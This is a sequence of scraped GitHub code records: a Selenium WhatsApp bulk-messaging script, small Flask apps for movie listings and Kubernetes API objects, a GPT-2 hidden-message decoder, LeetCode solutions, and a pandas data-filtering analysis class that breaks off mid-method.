driver.implicitly_wait(30)\r\n\r\n def test_getMsgInterface(self):\r\n # contact_errors = pd.DataFrame(columns=[\"celular\"])\r\n\r\n # contact_names = ['Daniel Lesmes','Humbewrewassfd','Fabio Sarmiento']\r\n # Obtener el input donde se ingresa el número de contacto para buscar el chat\r\n searchBox = '//*[@id=\"side\"]/div[1]/div/label/div/div[2]'\r\n\r\n # inputSearch = self.driver.find_element(By.XPATH,'//*[@id=\"side\"]/div[1]/div/label/div/div[2]')\r\n\r\n data = pd.read_excel(\"Data.xlsx\")\r\n viajes = pd.read_excel(\"Viajes.xlsx\")\r\n\r\n for index, row in data.iterrows():\r\n contact_name = row['contact_name']\r\n\r\n try:\r\n # Esperar a que cargue la página, máximo por 15 segundos\r\n # Asegurarse de que está limpio el input\r\n wait = WebDriverWait(self.driver,30)\r\n inputSearch = wait.until(lambda driver:self.driver.find_element(By.XPATH,searchBox))\r\n\r\n inputSearch.clear()\r\n\r\n # ingresar el número de contacto\r\n inputSearch.send_keys(contact_name)\r\n\r\n contact_xpath = '//span[@title=\"{}\"]'.format(contact_name)\r\n\r\n\r\n # contact_xpath = '//*[@id=\"pane-side\"]/div[1]/div/div/div[7]'\r\n\r\n # inputSearch = wait.until(lambda driver:self.driver.find_element(By.XPATH,searchBox))\r\n # contact_title = self.driver.find_element(By.XPATH,contact_xpath)\r\n contact_title = wait.until(lambda driver:self.driver.find_element(By.XPATH,contact_xpath))\r\n contact_title.click()\r\n\r\n inputMessage_xpath = '//*[@id=\"main\"]/footer/div[1]/div/span[2]/div/div[2]/div[1]/div/div[2]'\r\n inputMessage = wait.until(lambda driver:self.driver.find_element(By.XPATH,inputMessage_xpath))\r\n\r\n # mensaje = row['message']\r\n # inputMessage.send_keys(mensaje)\r\n\r\n for index2, row2 in viajes.iterrows():\r\n msg = '*Tipo de vehículo*: {}'.format(row2['tipo_vehiculo'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = '*Origen*: {}'.format(row2['origen'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = '*Destino*: {}'.format(row2['destino'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = '*Carrocería*: {}'.format(row2['carroceria'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = '*Flete*: {}'.format(row2['flete'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.LEFT_SHIFT,Keys.ENTER)\r\n msg = '*Observaciones*: {}'.format(row2['observaciones'])\r\n inputMessage.send_keys(msg)\r\n inputMessage.send_keys(Keys.ENTER)\r\n \r\n # inputMessage.send_keys(Keys.ENTER)\r\n\r\n except:\r\n error_msg = \"No se puedo enviar el mensaje a: {}\".format(contact_name)\r\n print(error_msg)\r\n\r\n def tearDown(self) -> None:\r\n self.driver.quit()\r\n\r\nif __name__ == '__main__':\r\n unittest.main(verbosity=2)","repo_name":"ossev/wpsender","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"3680462107","text":"from flask import Flask, render_template, url_for\napp = Flask(__name__)\nfrom model import *\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n showtimes = Showtime.query.join(Movie,Movie.movieID == Showtime.movieID).order_by(Showtime.price,Showtime.showtime).all()\n movies = Movie.query.all()\n theaters = Theater.query.all()\n return render_template('home.html',showtimes=showtimes, movies=movies, theaters=theaters)\n\n@app.route(\"/movies\")\ndef getMovies():\n moviesList = Movie.query.all()\n return render_template('movies.html',title='Now Playing', moviesList=moviesList)\n\n@app.route(\"/theaters\")\ndef getTheaters():\n theaters = Theater.query.all()\n return render_template('theaters.html',title='Theaters',theaters=theaters)\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html',title='About')\n\n@app.route(\"/help\")\ndef help():\n return render_template('help.html',title='Help')\n\nif __name__ == \"__main__\":\n app.run() ","repo_name":"Skykist/Tixter","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"40305317890","text":"import os\nfrom transformers import GPT2LMHeadModel, GPT2Tokenizer\nimport torch\nimport re\nimport json\n\n\nclass Decoder:\n def __init__(self, has_encoder=False, dic=\"decode_dict.json\"):\n self.type = 'encoder' if has_encoder else 'simple'\n if self.type == 'encoder':\n self.decode_dict = json.load(open(dic, 'r'))\n self.decode_pattern = re.compile(r\"\\{([a-z \\{\\}\\?]{1,2})\\}\")\n def decode(self, string):\n if self.type == 'simple':\n return string\n \n return re.sub(self.decode_pattern, lambda m: self.decode_dict[m.group(0)], string).capitalize()\n \nprint(\"Initializing model...\\n\")\n\n# If you have save the model locally use these commands to import the model\n# tokenizer = GPT2Tokenizer.from_pretrained(\"/opt/NLP_Models/gpt2-model/\", local_files_only=True)\n# model = GPT2LMHeadModel.from_pretrained(\"/opt/NLP_Models/gpt2-model/\", local_files_only=True)\n\ntokenizer = GPT2Tokenizer.from_pretrained('gpt2')\nmodel = GPT2LMHeadModel.from_pretrained('gpt2')\n\ncharset = [' ', 'a', 'i', 'n', 'm', '{', '}', 'd', 'l', 's', 'r', 'h', 'o', 'u', 'e', 'y', 'b', 'x', 't', 'g', 'j', 'z', 'v', 'k', 'c', 'p', 'f', '?', 'w', 'q']\ninit_len = 5\ndecoder = Decoder(has_encoder=os.path.exists(\"decode_dict.json\"))\n\ntext = input(\"Input the output of the model to reveal the message: \")\n\nin_seq = torch.tensor(tokenizer.encode(text))\ncontext = in_seq[:init_len]\nmsg = \"\"\nk=len(charset)\nwith torch.no_grad():\n for i in range(init_len, in_seq.shape[0]):\n output = model(context)\n msg += charset[torch.where(torch.topk(output[0][-1, :], k).indices == in_seq[i])[0][0].item()]\n context = torch.cat((context, in_seq[i].unsqueeze(0)))\n\nprint(\"\\nGenerated output: \")\nprint(decoder.decode(msg))","repo_name":"Mahan-AK/GPTCrypt","sub_path":"RevealMSG.py","file_name":"RevealMSG.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"11641210439","text":"from kubernetes import client\nfrom flask import Flask, render_template, request, jsonify, abort\nfrom six import iteritems\n\napp = Flask(__name__)\n\n\nclass KuberAPI:\n def __init__(self):\n pass\n\n Deployment = {'AppsV1beta1': 'AppsV1beta1Deployment',\n 'ExtensionsV1beta1': 'ExtensionsV1beta1Deployment',\n 'v1': 'V1Deployment'}\n\n Pod = {'v1': 'V1Pod'}\n\n ReplicaSet = {'v1': 'V1ReplicaSet',\n 'v1beta1': 'V1beta1ReplicaSet',\n 'v1beta2': 'V1beta2ReplicaSet'}\n\n ReplicationController = {'v1': 'V1ReplicationController'}\n\n StatefulSet = {'v1': 'V1StatefulSet',\n 'v1beta1': 'V1beta1StatefulSet',\n 'v1beta2': 'V1beta2StatefulSet'}\n\n Service = {'v1api': 'V1APIService',\n 'v1': 'V1Service',\n 'v1beta1': 'V1beta1APIService'}\n\n Volume = {'v1': 'V1Volume'}\n\n PersistentVolume = {'v1': 'V1PersistentVolume'}\n\n NameSpace = {'v1': 'V1Namespace'}\n\n DaemonSet = {'v1': 'V1DaemonSet',\n 'v1beta1': 'V1beta1DaemonSet',\n 'v1beta2': 'V1beta2DaemonSet'}\n\n Job = {'v1': 'V1Job'}\n\n CronJob = {'v1beta1': 'V1beta1CronJob',\n 'v2alpha1': 'V2alpha1CronJob'}\n\n Role = {'v1': 'V1Role',\n 'v1alpha1': 'V1alpha1Role',\n 'v1beta1': 'V1beta1Role'}\n\n RoleBinding = {'v1beta1': 'V1beta1RoleBinding',\n 'v1alpha1': 'V1alpha1RoleBinding',\n 'v1': 'V1RoleBinding'}\n\n ClusterRole = {'v1': 'V1ClusterRole',\n 'v1alpha1': 'V1alpha1ClusterRole',\n 'v1beta1': 'V1beta1ClusterRole'}\n\n ClusterRoleBinding = {'v1beta1': 'V1beta1ClusterRoleBinding',\n 'v1alpha1': 'V1alpha1ClusterRoleBinding',\n 'v1': 'V1ClusterRoleBinding'}\n\n\nclass Leaves:\n def __init__(self, name, attr_name=None):\n self.has_child_attr = False\n self.__name__ = name\n self.attr_name = attr_name\n\n\nclass KuberParser:\n def __init__(self, Object=None, ObjectName=None, attr_name=None):\n self.has_child_attr = True\n self.is_list_attr = False\n if Object:\n self.object = Object\n if ObjectName:\n self._name_parser(ObjectName, attr_name)\n self.attr_name = attr_name\n\n def _name_parser(self, name, attr_name):\n if name.startswith('dict') or name.startswith('datetime') or name.startswith('str') \\\n or name.startswith('int') or name.startswith('bool') or name.startswith('list[str]') \\\n or name.startswith('object') or name.startswith('list[int]'):\n\n self.object = Leaves(name, attr_name)\n self.has_child_attr = False\n elif name.startswith('list['):\n name = name.split('list[')[1].split(']')[0]\n self.object = getattr(client, name)\n self.is_list_attr = True\n else:\n self.object = getattr(client, name)\n\n @property\n def name(self):\n return self.object.__name__\n\n def child_object(self, attr):\n return getattr(client, self.object.swagger_types[attr])()\n\n\n@app.route('/node/', methods=['post', 'get'])\ndef node(init_id):\n args = request.args.get('object_name').split('#')\n if args == ['', '']:\n version, attr_name = init_id.split('-')\n parent_name = getattr(KuberAPI, attr_name)[version]\n parent_attr = 'root'\n else:\n parent_name, attr_name, parent_attr = args\n\n print(request.args.get('object_name'), args)\n if not parent_name:\n parent_name = 'AppsV1beta1Deployment'\n attr_name = 'Deployment'\n parent_attr = 'root'\n attr = KuberParser(ObjectName=parent_name, attr_name=attr_name)\n res = {\"id\": attr.name + '#' + attr.attr_name + \"#\" + parent_attr, \"text\": attr.attr_name, 'children': []}\n for key, value in iteritems(attr.object.swagger_types):\n child = KuberParser(ObjectName=value, attr_name=attr.object.attribute_map[key])\n if child.has_child_attr:\n if child.is_list_attr:\n item = {\"id\": child.name + '#' + child.attr_name + ' | list' + '#' + attr.name, \"text\": child.attr_name + ' | list',\n \"children\": child.has_child_attr}\n else:\n item = {\"id\": child.name + '#' + child.attr_name + '#' + attr.name, \"text\": child.attr_name,\n \"children\": child.has_child_attr}\n else:\n item = {\"id\": child.name + '#' + child.attr_name + '#' + attr.name, \"text\": child.attr_name + ' | ' + child.name + '',\n \"type\": 'leaf'}\n res['children'].append(item)\n return jsonify(res)\n\n\n@app.route('/get_object')\ndef get_object():\n \"\"\"\n return API objects\n :return:\n \"\"\"\n obj = [i for i in KuberAPI.__dict__.keys() if not i.startswith('__')]\n return jsonify({'obj': obj})\n\n\n@app.route('/get_version')\ndef get_version():\n \"\"\"\n return API version\n :return:\n \"\"\"\n obj = request.args.get('obj')\n if not obj:\n abort(400)\n obj = getattr(KuberAPI, obj)\n versions = [k for k, _ in iteritems(obj)]\n return jsonify({'versions': versions})\n\n\n@app.route('/index')\ndef index():\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n\n","repo_name":"liverpoolpjy/kuber-yaml-helper","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"30761281286","text":"class Solution:\n def minIncrementForUnique(self, nums: List[int]) -> int:\n \n nums.sort()\n count = dict()\n ans = 0\n largest = 0\n for i in range(len(nums)):\n \n if(count.get(nums[i]) == None):\n count[nums[i]] = 1\n else:\n ans += nums[i - 1] - nums[i] + 1\n nums[i] = nums[i -1] + 1 \n count[nums[i]] = 1\n \n \n return ans","repo_name":"albetre21/competitive-programming","sub_path":"0945-minimum-increment-to-make-array-unique/0945-minimum-increment-to-make-array-unique.py","file_name":"0945-minimum-increment-to-make-array-unique.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"15190364235","text":"from is_substring import is_substring\n\ndef is_rotation(s1, s2):\n\t\"\"\" checks whether string 2 (s2) is a rotation of string 1 (s1) \n\tusing only 1 call to is_substring\"\"\"\n\n\t# we concat one string because if s2 is a rotation of s1, \n\t# this will \"remake\" or \"reconstitute\" s2 in the middle of check_string\n\tcheck_string = s1 + s1\n\n\treturn is_substring(check_string, s2)\n\nassert is_rotation(\"erbottlewat\", \"waterbottle\") == True\nassert is_rotation(\"waterbottle\", \"botwater\") == False","repo_name":"jcshott/interview_prep","sub_path":"cracking_code_interview/ch1_arrays-strings/rotation.py","file_name":"rotation.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"70850080814","text":"# 문제\n# 예제를 보고 규칙을 유추한 뒤에 별을 찍어 보세요.\n#\n# 입력\n# 첫째 줄에 N이 주어진다.\n# N은 항상 3의 제곱꼴인 수이다. (1, 3, 9, 27, ...) (N=3k, 0 ≤ k < 8)\n#\n# 출력\n# 첫째 줄부터 N번째 줄까지 별을 출력한다.\n\n\ndef draw_star(mod, i, j):\n if (i // mod) % 3 == 1 and (j // mod) % 3 == 1:\n print(\" \", end=\"\")\n\n else:\n if mod // 3 == 0:\n print(\"*\", end=\"\")\n\n else:\n draw_star(mod // 3, i, j)\n\n\nn = int(input())\n\nfor i in range(n):\n for j in range(n):\n draw_star(n, i, j)\n print()\n","repo_name":"alstn2468/baekjoon-online-judge","sub_path":"2400~2499/2447.py","file_name":"2447.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"ko","doc_type":"code","stars":21,"dataset":"github-code","pt":"56"} +{"seq_id":"3111543179","text":"\"\"\"\nGiven the roots of two binary trees root and subRoot, return true \nif there is a subtree of root with the same structure and node \nvalues of subRoot and false otherwise.\n\nA subtree of a binary tree tree is a tree that consists of a node \nin tree and all of this node's descendants. The tree tree could \nalso be considered as a subtree of itself.\n\n \n\nExample 1:\n\n\nInput: root = [3,4,5,1,2], subRoot = [4,1,2]\nOutput: true\nExample 2:\n\n\nInput: root = [3,4,5,1,2,null,null,null,null,0], subRoot = [4,1,2]\nOutput: false\n \n\nConstraints:\n\nThe number of nodes in the root tree is in the range [1, 2000].\nThe number of nodes in the subRoot tree is in the range [1, 1000].\n-104 <= root.val <= 104\n-104 <= subRoot.val <= 104\n\nDifficulty: Easy\nCompleted: 6/21/2022\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def check(self, root, subRoot): # checks two trees for sameness\n if not (root and subRoot): return root == subRoot # one or both of the nodes are NULL\n return root.val == subRoot.val and \\\n self.check(root.left, subRoot.left) and \\\n self.check(root.right, subRoot.right) # check that node values and children are the same\n\n def isSubtree(self, root: Optional[TreeNode], subRoot: Optional[TreeNode]) -> bool:\n if not (root and subRoot): return root == subRoot # one or both of the nodes are NULL \n if self.check(root, subRoot): return True # call the check function\n return self.isSubtree(root.left, subRoot) or \\\n self.isSubtree(root.right, subRoot) # see if there's a match for either child\n\n\"\"\"\nExplanation:\n\nThe check function checks for sameness for two nodes.\n\nWe first check the root node for sameness with the subtree\nnode. If we find that those are unidentical, we move on to\ncheck the children of the root.\n\nTime Complexity: O(N)\nSpace Complexity: O(1)\n\"\"\"\n","repo_name":"joburn5000/blind_75_challenge","sub_path":"tree/subtree_of_another_tree.py","file_name":"subtree_of_another_tree.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"20633436663","text":"import datetime\nimport functools\nimport itertools\nimport logging\nimport operator\nimport random\nimport statistics\n\nfrom functools import reduce\n\nimport pandas as pd\nfrom pandas.api.types import is_string_dtype, is_integer_dtype, is_bool_dtype\n\nNATURAL_DIVIDER_THRESOLD = 30\nMULTIPLE_COMBINATION_FILTERS = 5000\nMULTI_COL_FILTER_RATIO = 0.05\nTODAY = datetime.date(2019, 4, 1)\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef isin_row(row, df):\n \"\"\"Given a 'row' (specific combination of values for the DF columns) this function searches the 'df'\n for that same combination of values, return True if the 'df' has that exact combination, False if otherwise.\n\n :param row: (DataFrame) single row df\n :param df: (DataFrame) df where the row is searched\n :return: Boolean\n \"\"\"\n cols = df.columns\n bool_series = functools.reduce(lambda x, y: x & y, [df[col].isin(row[col]) for col in cols])\n return bool_series.any()\n\n\nclass SingleColumnFilters:\n date_slices = {\n 'one_month_period': TODAY - datetime.timedelta(days=31),\n 'one_quarter_period': TODAY - datetime.timedelta(days=92),\n 'six_months_period': TODAY - datetime.timedelta(days=183),\n 'one_year_period': TODAY - datetime.timedelta(days=365),\n 'mtd': datetime.date(TODAY.year, TODAY.month, 1),\n 'ytd': datetime.date(TODAY.year, 1, 1)\n }\n\n def __init__(self, input_df, resulting_df, merging_cols=None, input_file_name=None):\n self.extended_resulting_df = pd.DataFrame()\n self.filtering_quick_gains = list()\n self.final_df = pd.DataFrame()\n self.input_df = input_df\n self.input_file_name = input_file_name\n self.matching_cols = list()\n self.matching_id_cols = list()\n self.merging_cols = merging_cols\n self.natural_dividers_dtypes = dict()\n self.overall_percentage = float()\n self.resulting_df = resulting_df\n self.usage_percentage = dict()\n\n def make_analysis(self, apply_filter=False):\n \"\"\"Runs functions of the class SingleColumnFilters on an object of the class to get the best single\n column filter while also generating the data for the 'print_report' and 'generate_data_usage_plot'.\n\n Parameters:\n self (object): an object of the class SingleColumnFilters\n Returns:\n None\n \"\"\"\n logging.info(\"Starting Analisis\")\n self.find_matching_cols()\n if not self.matching_cols:\n logging.warning('Without shared columns this tool is worthless, consider renaming columns')\n return\n self._merge_input_to_final()\n self._set_final_df_to_work_with()\n self.columns_usage_percentage()\n logging.info(\"Column usage percentage:\")\n logging.info(self.usage_percentage)\n self.get_dtypes_for_natural_divider_cols()\n for slicing_col, dtype in self.natural_dividers_dtypes.items():\n if 'date' in dtype:\n self._determine_date_range_filters(slicing_col)\n else:\n self._determine_category_col_filters(slicing_col)\n self._determine_best_slicing_col_filter()\n if apply_filter:\n self._filter_and_save_inputfile(self.input_file_name)\n\n def find_matching_cols(self):\n \"\"\"Compares the columns in 'input_df' and 'resulting_df' to find columns present in both DF, a second list is\n calculated for columns also having id or Id in their name, to be used for merging the DFs if no 'merging_cols'\n list is provided.\n\n \"\"\"\n self.matching_cols = list(set(self.input_df.columns).intersection(self.resulting_df.columns))\n self.matching_id_cols = [col_name for col_name in self.matching_cols if 'id' in col_name or 'Id' in col_name]\n\n def _merge_input_to_final(self):\n \"\"\"Merges the 'input_df' to 'final_df', if a list of columns was passed to the instance the merge is executed\n on those columns, otherwise on all 'matching_id_cols'\n\n \"\"\"\n input_df_cols = list(set(self.input_df.columns) - set(self.matching_cols))\n try:\n if self.merging_cols:\n self._merge_input_to_final_on_merging_cols(input_df_cols)\n else:\n self._merge_input_to_final_on_matching_id_cols(input_df_cols)\n except Exception as e:\n logging.warning(\"\"\"The DFs have some 'id' columns to merge them but an exception\n araises when trying merge\"\"\")\n logging.warning(e)\n pass\n else:\n self.matching_cols = self.input_df.columns\n\n def _merge_input_to_final_on_merging_cols(self, input_df_cols):\n input_df_cols.extend(self.merging_cols)\n self.extended_resulting_df = self.resulting_df.merge(\n self.input_df[input_df_cols],\n how='left', on=self.merging_cols\n )\n\n def _merge_input_to_final_on_matching_id_cols(self, input_df_cols):\n input_df_cols.extend(self.matching_id_cols)\n self.extended_resulting_df = self.resulting_df.merge(\n self.input_df[input_df_cols],\n how='left', on=self.matching_id_cols\n )\n\n def _set_final_df_to_work_with(self):\n \"\"\"Checks if the 'input_df' was merged to 'final_df', to work with that merged DF, which increases the scope\n of the analysis because all columns are considered, otherwise only the 'matching cols'.\n\n \"\"\"\n if not self.extended_resulting_df.empty:\n self.final_df = self.extended_resulting_df\n else:\n self.final_df = self.resulting_df\n logging.warning('The input df could not be merged into final, that decreases the chances of success')\n\n def columns_usage_percentage(self):\n \"\"\"Preliminary analysis that measure the ratio of unique values in 'input_df' that make it to the 'final_df',\n the lower the percentage the more file you are reading in vain, in that case a MySQL query adjustment or\n reading the table using Athena to filter a bucket would increase speed.\n\n \"\"\"\n for col in self.matching_cols:\n if 'date' in col or is_bool_dtype(self.input_df[col]):\n pass\n matching_rows = set(self.input_df[col].unique()).intersection(self.final_df[col].unique())\n if not matching_rows:\n logging.info('{} is in both DFs, but no matching data was found'.format(col))\n percentage = 0\n if col in self.merging_cols:\n raise ValueError('No keys to perform merge')\n else:\n percentage = len(matching_rows) / len(self.input_df[col].unique())\n self.usage_percentage.update({col: percentage})\n self.overall_percentage = statistics.mean(self.usage_percentage.values())\n\n def get_dtypes_for_natural_divider_cols(self):\n \"\"\"For each column in 'input_df' determine its dtype (many columns have dtype object which is not useful\n for this analysis). And add to a dictionary if 'is_natural_divider'\n\n \"\"\"\n for col in self.input_df.columns:\n if 'date' in col or 'Date' in col:\n self.input_df[col] = pd.to_datetime(self.input_df[col])\n self.natural_dividers_dtypes.update({col: 'date'})\n elif is_string_dtype(self.input_df[col]):\n if self._is_natural_divider(self.input_df[col]):\n self.natural_dividers_dtypes.update({col: 'string'})\n elif is_integer_dtype(self.input_df[col]):\n if self._is_natural_divider(self.input_df[col]):\n self.natural_dividers_dtypes.update({col: 'integer'})\n elif is_bool_dtype(self.input_df[col]):\n self.natural_dividers_dtypes.update({col: 'boolean'})\n\n def _is_natural_divider(self, df_series):\n \"\"\"Determines if a column of the 'input_df' would serve as a good filter, if the ratio of unique values to\n the number of rows is high the column is consider a 'natural divider' date columns are always natural dividers,\n but this function they may not show as, be cautious.\n\n :param df_series: (pandas series) series to be checked to see if it is a 'natural divider'\n :return: Boolean\n \"\"\"\n unique_rows = len(df_series.unique())\n if unique_rows == 1:\n return\n total_rows = len(df_series)\n ratio = total_rows / unique_rows\n logging.info('Column: {} has {} unique rows in {} rows, a {} to 1 relationship'.format(\n df_series._name, str(unique_rows), str(total_rows), str(ratio)))\n if ratio > NATURAL_DIVIDER_THRESOLD and self.usage_percentage[df_series._name] != 1:\n return 1\n\n def _handle_na_in_date_cols(self, col):\n \"\"\"This function checks for nans values in the 'input_df' DF for a given column, if there are such values\n in the 'input_df' but not in the 'final_df' it has found a valuable filter. It adds that finding to the\n 'filtering_quick_gains' list.\n\n :param col: (str) the name of the column in the 'input_df'\n \"\"\"\n number_of_nans = self.input_df[col].isna().sum()\n if number_of_nans and self.final_df[col].isna().sum() == 0:\n logging.info('Found query optimizing chance in col: {}, filter: nan'.format(col))\n self.filtering_quick_gains.append({\n 'column': col,\n 'dtype': 'date',\n 'filter_out': 'nan',\n 'useless_rows': number_of_nans,\n 'weighted_benefit': number_of_nans\n })\n\n def _determine_date_range_filters(self, col):\n \"\"\"For each of the time ranges determined in the 'date_slices' class dictionary this functions checks if\n there is data in the 'final_df' if not it continues with the next date range, otherwise it checks if there is\n data for that same date range in the 'input_df', if so, there is un needed rows in the 'input_df' that should\n be filtered. That information is stored in function variables to later, determine the best date range filter\n that can be applied to that column, that information is stored in a dictionary and appended to\n 'filtering_quick_gains' an instance list.\n\n :param col: (str) the name of the column in the 'input_df'\n \"\"\"\n self._handle_na_in_date_cols(col)\n non_na_inputdf = self.input_df.dropna(subset=[col])\n self.final_df[col] = pd.to_datetime(self.final_df[col])\n non_na_finaldf = self.final_df.dropna(subset=[col])\n weighted_benefit = 0\n for period, date_ in self.date_slices.items():\n lesser_date_final = non_na_finaldf.loc[non_na_finaldf[col] < date_]\n if not len(lesser_date_final):\n lesser_date_input = non_na_inputdf.loc[non_na_inputdf[col] < date_]\n if len(lesser_date_input) > weighted_benefit:\n logging.info('Found query optimizing chance in col: {}, filter: {}'.format(col, period))\n weighted_benefit = useless_rows = len(lesser_date_input)\n the_column = col\n filter_out = (period, date_)\n if weighted_benefit > 0:\n self.filtering_quick_gains.append({\n 'column': the_column,\n 'dtype': 'date',\n 'filter_out': filter_out,\n 'useless_rows': useless_rows,\n 'weighted_benefit': weighted_benefit\n })\n\n def _determine_category_col_filters(self, col):\n \"\"\"If a columns 'col' unique values are not fully present in the 'final_df' this function determines the\n unique values in the 'input_df' for the column 'col' not present in the 'resulting_df' / 'final_df' and\n adds that information to a instance dictionary for further analysis\n\n :param col: (str) the name of the column in the 'input_df'\n \"\"\"\n if self.usage_percentage[col] == 1:\n return\n unused_categos = set(self.input_df[col].unique()) - set(self.final_df[col].unique())\n unused_inputdf_rows = len(self.input_df.loc[self.input_df[col].isin(unused_categos)])\n expected_unused_rows_per_catego = unused_inputdf_rows / len(unused_categos)\n self.filtering_quick_gains.append({\n 'column': col,\n 'dtype': self.natural_dividers_dtypes[col],\n 'filter_out': unused_categos,\n 'useless_rows': unused_inputdf_rows,\n 'weighted_benefit': expected_unused_rows_per_catego\n })\n if len(unused_categos) > 100:\n logging.info(\n \"Found query optimizing chance in col: {}, reading ({}) unused rows, consider filtering out: {}\".format(\n col, unused_inputdf_rows, random.sample(unused_categos, 100)))\n else:\n logging.info(\n \"Found query optimizing chance in col: {}, reading ({}) unused rows, consider filtering out: {}\".format(\n col, unused_inputdf_rows, unused_categos))\n\n def find_largest_unused_catego_in_column(self, col):\n \"\"\"Checks which value in a column in in 'input_df' that does not appear in 'final_df' appears the must\n amount of times.\n\n :param col: (str) the name of the column\n \"\"\"\n unused_categos = set(self.input_df[col].unique()) - set(self.final_df[col].unique())\n if not unused_categos:\n raise ValueError(\"This column has no unused categories\")\n category_potential = dict()\n for category in unused_categos:\n unused_rows_for_category = len(self.input_df.loc[self.input_df[col] == category])\n category_potential.update({category: unused_rows_for_category})\n return max(category_potential.items(), key=operator.itemgetter(1))[0]\n\n def _determine_best_slicing_col_filter(self):\n \"\"\"For the items in 'filtering_quick_gains' fin the one which yields the must benefit;\n two deciding factors: total number of rows that can be filtered (the larger the better),\n the number of elements to filter out (the larger the worse)\n\n \"\"\"\n self.max_weighted_benefit = max([x['weighted_benefit'] for x in self.filtering_quick_gains])\n max_eficiency_potential_info = [item for item in self.filtering_quick_gains\n if item['weighted_benefit'] == self.max_weighted_benefit][0]\n if max_eficiency_potential_info['dtype'] != 'date':\n category_to_filter = self.find_largest_unused_catego_in_column(max_eficiency_potential_info['column'])\n logging.info(\"The suggested column to filter is {}, recommended value to filter: {}\".format(\n max_eficiency_potential_info['column'], category_to_filter\n ))\n self.best_filter = (\n max_eficiency_potential_info['column'],\n category_to_filter,\n max_eficiency_potential_info['dtype'],\n max_eficiency_potential_info['excpeted_unused_rows_per_catego'],\n )\n else:\n logging.info(\"The suggested column to filter is {}, recommended period to filter: {}\".format(\n max_eficiency_potential_info['column'], max_eficiency_potential_info['filter_out'][0]\n ))\n self.best_filter = (\n max_eficiency_potential_info['column'],\n max_eficiency_potential_info['filter_out'],\n max_eficiency_potential_info['dtype'],\n max_eficiency_potential_info['weighted_benefit'],\n max_eficiency_potential_info['weighted_benefit'] / len(self.input_df)\n )\n\n def _filter_and_save_inputfile(self, input_file_name):\n \"\"\"Applies the best filter, result of running 'analyze_one_input_to_result' to the input_df and saves it,\n replacing the original file.\n\n Parameters:\n input_file_name (string): the path and name of the input csv\n Returns:\n None\n \"\"\"\n # filter input DF with best filter found in analisis\n if self.best_filter[2] == 'date':\n nan_rows = self.input_df.loc[self.input_df[self.best_filter[0]].isnull()]\n self.input_df = self.input_df.loc[\n self.input_df[self.best_filter[0]] > self.best_filter[1][1]\n ]\n self.input_df = pd.concat([self.input_df, nan_rows])\n else:\n self.input_df = self.input_df.loc[\n self.input_df[self.best_filter[0]] != self.best_filter[1]\n ]\n self.input_df.to_csv(input_file_name, index=False, encoding='utf-8', escapechar='\\\\')\n\n\nclass MultiColumnFilters(SingleColumnFilters):\n\n def __init__(self, input_df, resulting_df, merging_cols=None):\n self.input_df = input_df\n self.resulting_df = resulting_df\n self.merging_cols = merging_cols\n super(SingleColumnFilters, self).__init__()\n self.usage_percentage = dict()\n self.combo_cols = dict()\n self.combos_to_check_in_final = list()\n self.combos_to_exclude = pd.DataFrame()\n\n def get_multi_column_filters(self):\n logging.info(\"Starting Multi Column Filter Analisis\")\n self.find_matching_cols()\n if not self.matching_cols:\n logging.warning('Without shared columns this tool is worthless, consider renaming columns')\n return\n self._merge_input_to_final()\n self._set_final_df_to_work_with()\n self.columns_usage_percentage()\n self._determine_possible_multi_column_filters()\n self._determine_multi_column_filters()\n\n def _combo_appears_often_in_input(self, combo, input_catego_groupby):\n \"\"\"Given a combination of values for the columns in 'combo_cols' this function weights the amount\n of appearences in relation to the 'input_df' to determine if a filter excluding this combination is valuable.\n\n :param row: (DataFrame) single row df\n :param input_catego_df: (DataFrame): a DataFrame grouped by columns in 'combo_cols'\n :return: Boolean\n \"\"\"\n df = self.input_df.loc[input_catego_groupby.groups[combo]]\n multi_col_filter_ratio = len(df) / len(self.input_df)\n if multi_col_filter_ratio > MULTI_COL_FILTER_RATIO:\n return 1\n else:\n return 0\n\n def _determine_possible_multi_column_filters(self):\n \"\"\"For the values / columns combinations generated using 'generate_possible_combinations', check if the\n combination exists in the 'input_df'.\n\n \"\"\"\n combinations_generator = self._generate_possible_combinations()\n input_catego_groupby = self.input_df.groupby(self.combo_cols)\n for combo in combinations_generator:\n if combo in input_catego_groupby.groups:\n if self._combo_appears_often_in_input(combo, input_catego_groupby):\n combo_row_df = pd.DataFrame([combo], columns=self.combo_cols)\n self.combos_to_check_in_final.append(combo_row_df)\n\n def _generate_possible_combinations(self):\n 